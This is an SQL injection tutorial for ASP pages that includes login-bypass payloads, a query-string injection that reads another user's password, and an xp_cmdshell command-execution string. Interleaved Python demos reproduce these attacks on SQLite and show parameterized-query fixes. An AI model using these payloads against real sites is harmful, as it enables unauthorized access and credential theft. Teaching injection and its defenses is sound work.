By: DangerDuo - doma111@yahoo.com

Preface

Welcome to Part II of our paper on When Code Goes Wrong. This part explains one of the most common input validation attacks, known as SQL injection. The topic should be much easier to understand than the stack-based exploit from Part I. Our example today is written in ASP, so basic ASP and SQL knowledge is required.

Lets Begin

Okay, so we come across a website that asks for a username and password. An example would be a porn site :) You check and see that the page is an .asp page (Active Server Page) or uses some other kind of server-side scripting language. Imagine the code behind the login page looks like this (leaving out the database connection setup, since only the SQL string matters to us):

login.asp

rs.Open "SELECT * FROM account WHERE username = '" & Request.Form("username") & "' AND password = '" & Request.Form("password") & "'", conn

Obviously we have no idea what the username and password are. But this code already has a vulnerability: the form fields are pasted straight into the SQL string, so whatever we type becomes part of the query. That lets us add SQL of our own and get a different result.

Normally we would enter something like:

Username: Jason
Password: honky

so the SQL statement would look like:

SELECT * FROM account WHERE username = 'Jason' AND password = 'honky'

But what if we enter:

Username: ' or ''='
Password: ' or ''='

so it becomes:

SELECT * FROM account WHERE username = '' or ''='' AND password = '' or ''=''
                                       |---------|                |---------|
                                        Replaced                   Replaced

As you can see, the quote we typed closes the string the programmer opened, so username and password now point to an empty string, and the rest of our input is parsed as SQL. No row has an empty username or password, but the "or" clauses rescue the condition: ''='' is always true. Remember that AND binds tighter than OR, so the WHERE clause reads as username = '' OR (''='' AND password = '') OR ''='', and that last OR is true for every row in the table. The query returns every account, and the login code happily takes the first one, so you get access to the protected site as whatever account comes first in the database. This is the most basic idea of SQL injection.

Now imagine we encounter this:

http://www.honky.com/list.asp?page=1

Imagine that the database table contains both the pages and the accounts.
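Here is an added example (my own Python, not code from the original paper) that replays the bypass against an in-memory SQLite database standing in for the ASP page's account table, then shows the one-line fix: bind the form fields as parameters instead of gluing them into the SQL string. The rows in SAMPLE_ACCOUNTS and the function names are constructed for the demo.

```python
import sqlite3

# Constructed sample data standing in for the "account" table the page describes.
SAMPLE_ACCOUNTS = [("admin", "s3cret"), ("Jason", "honky")]


def make_db():
    """In-memory SQLite database with the page's 'account' table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO account VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def build_vulnerable_sql(username, password):
    """Mirror of the page's login.asp string concatenation (deliberately vulnerable):
    the user's input lands inside the SQL text, so a quote in it ends the literal."""
    return ("SELECT * FROM account WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Runs the concatenated query and returns the first row, as the ASP page would.
    With the ' or ''=' payload the WHERE clause becomes
    username = '' OR (''='' AND password = '') OR ''='' and matches every row."""
    return conn.execute(build_vulnerable_sql(username, password)).fetchone()


def login_parameterized(conn, username, password):
    """Hardened version: placeholders keep the input as data, never as SQL.
    The payload is now just a nine-character username that matches nobody."""
    sql = "SELECT * FROM account WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    payload = "' or ''='"
    print(build_vulnerable_sql(payload, payload))
    print(login_vulnerable(conn, payload, payload))      # first row in the table
    print(login_parameterized(conn, payload, payload))   # None: no such user
```

Run it and compare the two results: the concatenated query hands back the first account in the table for the ' or ''=' payload, while the parameterized one returns nothing, because the database now sees the payload as a nine-character username rather than as SQL.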
(Seriously, this doesn't happen in practice, but it works for the example.)

id = Request.QueryString("page")
rs.Open "SELECT * FROM table WHERE page=" & id, conn

So if id = 1, it gives us the row where page = 1. Imagine the table also has the fields username and password. Now try:

http://www.honky.com/list.asp?page=0 OR username='honky'

(the browser will URL-encode the spaces and quotes as %20 and %27.) Because page is a number, the programmer did not put quotes around it, so this time we do not need a quote to break out of a string; our OR is appended directly to the WHERE clause. page=0 matches nothing, so the row that comes back is the one whose username is honky. In this example we have to guess or brute-force the username, since this isn't a login page that tells us who exists. But through the line above, if successful, we can read the password of the user honky, provided the page displays the columns of the row it fetched.

In MS SQL we can go further, because it lets us chain statements with a semicolon:

'; exec master..xp_cmdshell 'ping' --

This closes the programmer's string, ends his statement, and runs the ping command on the database server through xp_cmdshell. If you want to get rid of everything the programmer wrote after your injection (such as his closing quote, which would otherwise leave an unterminated string), use ;-- : the -- starts a comment in MS SQL, so anything after it is ignored. Note that xp_cmdshell only works if the account the web application uses to connect to the database has the rights to run it.

Ending

I think that's about it... This is the basic idea. I am sorry this article is extremely cheap... Here are some references you can look at to expand your knowledge on SQL injection:

http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
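Coming back to the list.asp example: the following added Python example (mine, not from the original paper) shows the numeric-context injection and why the -- marker matters, again using an in-memory SQLite table. The table layout, the rows, and the extra AND published=1 clause on the query are assumptions made for the demo; SQLite treats -- as a comment just as MS SQL does.

```python
import sqlite3

# Constructed sample data: following the page, one table holds both the site's pages
# (published rows with a page number) and the accounts (unpublished rows with no page
# number). Column names and values are made up for this demo.
SAMPLE_ROWS = [
    (1, "welcome", 1, None, None),
    (2, "news", 1, None, None),
    (None, None, 0, "honky", "hunter2"),
]


def make_db():
    """In-memory SQLite stand-in for the list.asp database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (page INTEGER, title TEXT, published INTEGER,"
        " username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_sql(page_param):
    """Mirror of list.asp: the numeric id is concatenated with no quotes around it,
    so no quote is needed to break out. The trailing 'AND published=1' is an assumed
    extra clause, added so the effect of the -- comment marker can be seen."""
    return "SELECT * FROM pages WHERE page=" + page_param + " AND published=1"


def fetch_vulnerable(conn, page_param):
    """Runs the concatenated query exactly as the ASP page would."""
    return conn.execute(build_vulnerable_sql(page_param)).fetchall()


def fetch_hardened(conn, page_param):
    """Hardened version: insist the parameter really is an integer, then bind it."""
    try:
        page = int(page_param)
    except ValueError:
        return []   # reject anything that is not a plain number
    return conn.execute(
        "SELECT * FROM pages WHERE page=? AND published=1", (page,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Normal request: page 1.
    print(fetch_vulnerable(conn, "1"))
    # No quote needed in a numeric context, but AND binds tighter than OR, so the
    # programmer's trailing 'AND published=1' still filters honky's row out.
    print(fetch_vulnerable(conn, "0 OR username='honky'"))
    # -- comments out the rest of the programmer's query, so honky's row comes back.
    print(fetch_vulnerable(conn, "0 OR username='honky' --"))
    # The hardened version refuses the payload outright.
    print(fetch_hardened(conn, "0 OR username='honky' --"))
```

The middle case is the one worth remembering: without the comment marker the injected OR is still subject to whatever the programmer wrote after it, which is exactly why the page's ;-- trick exists. The hardened fetch does two independent things, type-checks the parameter and binds it; either alone would stop this payload, but doing both costs nothing.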